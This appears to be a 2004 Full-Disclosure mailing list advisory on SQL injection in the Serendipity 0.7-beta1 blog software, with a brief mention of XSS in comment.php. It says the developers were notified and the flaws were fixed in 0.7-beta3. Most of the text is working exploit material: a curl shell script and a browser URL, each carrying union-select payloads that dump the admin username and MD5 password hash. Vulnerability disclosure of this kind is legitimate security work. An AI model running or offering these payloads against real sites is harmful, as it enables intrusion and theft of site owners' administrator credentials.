Serendipity 0.7-beta1 SQL Injection Proof of Concept By aCiDBiTS acidbits@gmail.com 13-September-2004 "Serendipity (http://www.s9y.org/) is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source (BSD License)." There is no user input sanitation for parameters entry_id in exit.php and comment.php prior being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Comment.php is also prone to XSS through email and username post's fields. Serendipity 0.7-beta1 and older versions are vulnerable. Developer team had been notified 13-September-2004 and this vulnerabilities are fixed from Serendipity 0.7-beta3. These PoCs dumps admin's username and md5(password). Proof of Concept 1 ------------------ Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog ser_sqli_poc.sh ---------8<-----------8<------------- #!/bin/sh echo -n "Username: " curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b10- echo -n "MD5(password): " curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1" | grep Location | cut -b10- ---------8<-----------8<------------- Proof of Concept 2 ------------------ Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog. http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/* \ / (Oo) //||\\ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html